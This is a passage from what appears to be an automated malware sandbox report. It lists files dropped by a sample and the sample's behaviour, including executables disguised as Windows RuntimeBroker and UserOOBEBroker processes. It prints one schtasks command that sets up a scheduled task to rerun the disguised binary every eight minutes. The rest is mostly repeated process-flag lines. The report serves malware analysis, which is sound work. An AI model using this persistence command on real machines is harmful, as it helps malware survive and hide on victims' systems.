                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\mmgyBVMD.logJump to dropped file
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeFile created: C:\Users\user\Desktop\cDNiSsHV.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\tbIFYUNW.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\oGlGPwkc.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\YEfCwsuO.logJump to dropped file
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeFile created: C:\Users\user\Desktop\wJkgsuUR.logJump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\U1jaLbTw1f.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\jDownloader\config\mGDcgYSpPaqkzVyIrStmzarQirIs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Program Files\Windows Security\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\LiveKernelReports\UserOOBEBroker.exeProcess information set: NOOPENFILEERRORBOX
